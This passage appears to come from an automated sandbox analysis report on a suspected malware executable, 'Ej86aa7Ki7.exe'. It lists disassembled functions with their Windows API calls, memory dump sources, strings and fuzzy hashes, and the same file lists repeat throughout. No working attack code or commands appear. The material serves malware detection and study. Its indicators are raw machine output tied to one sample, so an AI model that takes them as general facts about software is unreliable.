        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Close$DeleteEnumOpen
        • String ID:
        • API String ID: 1912718029-0
        • Opcode ID: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
        • Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
        • Opcode Fuzzy Hash: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
        • Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69
        Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
        Download Yara Rule
        APIs
        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$Timeout
        • String ID: !
        • API String ID: 1777923405-2657877971
        • Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
        • Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
        • Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
        • Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28
        Function 004025AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
        Download Yara Rule
        APIs
        • WideCharToMultiByte.KERNEL32(?,?,0040B5D8,000000FF,loyolism,00000400,?,?,00000021), ref: 004025FE
        • lstrlenA.KERNEL32(loyolism,?,?,0040B5D8,000000FF,loyolism,00000400,?,?,00000021), ref: 00402609
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: ByteCharMultiWidelstrlen
        • String ID: loyolism
        • API String ID: 3109718747-2838521280
        • Opcode ID: 91cc700c78dfe4b07254198256f44d4729cb2cbe27dddbc7cc6f12c5bdf8e3c1
        • Instruction ID: 0226f840347654c2ecdc96a32175c32971a63fe26a5c545fd31e5d705646dbf5
        • Opcode Fuzzy Hash: 91cc700c78dfe4b07254198256f44d4729cb2cbe27dddbc7cc6f12c5bdf8e3c1
        • Instruction Fuzzy Hash: CE11C872A05714BADB106BB18E8999E7765AF00359F20453FF102F61C1DAFC8982575E
        Function 00405BC6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
        Download Yara Rule
        APIs
        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BD6
        • lstrcatW.KERNEL32(?,0040A014), ref: 00405BE8
        Strings
        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CharPrevlstrcatlstrlen
        • String ID: C:\Users\user\AppData\Local\Temp\
        • API String ID: 2659869361-823278215
        • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
        • Instruction ID: 65d0506ad812cb1a76e9921ecf3bea8c464967d5314b17a54056b3388df28152
        • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
        • Instruction Fuzzy Hash: 41D05E31101535AAC2117B44AC04CDB66AC9E46304342487EF541B60A9C77C696296EE
        Function 00403D31 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
        Download Yara Rule
        APIs
        • SetWindowTextW.USER32(00000000,00429240), ref: 00403DC9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: TextWindow
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$1033
        • API String ID: 530164218-1872632071
        • Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
        • Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
        • Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
        • Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9
        Function 004052E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
        Download Yara Rule
        APIs
        • IsWindowVisible.USER32(?), ref: 00405314
        • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
          • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Window$CallMessageProcSendVisible
        • String ID:
        • API String ID: 3748168415-3916222277
        • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
        • Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
        • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
        • Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D
        Function 00405C12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
        Download Yara Rule
        APIs
        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ej86aa7Ki7.exe,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405C18
        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ej86aa7Ki7.exe,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405C28
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CharPrevlstrlen
        • String ID: C:\Users\user\Desktop
        • API String ID: 2709904686-1246513382
        • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
        • Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
        • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
        • Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD
        Function 00405D4C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
        Download Yara Rule
        APIs
        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
        • CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
        • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: lstrlen$CharNextlstrcmpi
        • String ID:
        • API String ID: 190613189-0
        • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
        • Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
        • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
        • Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99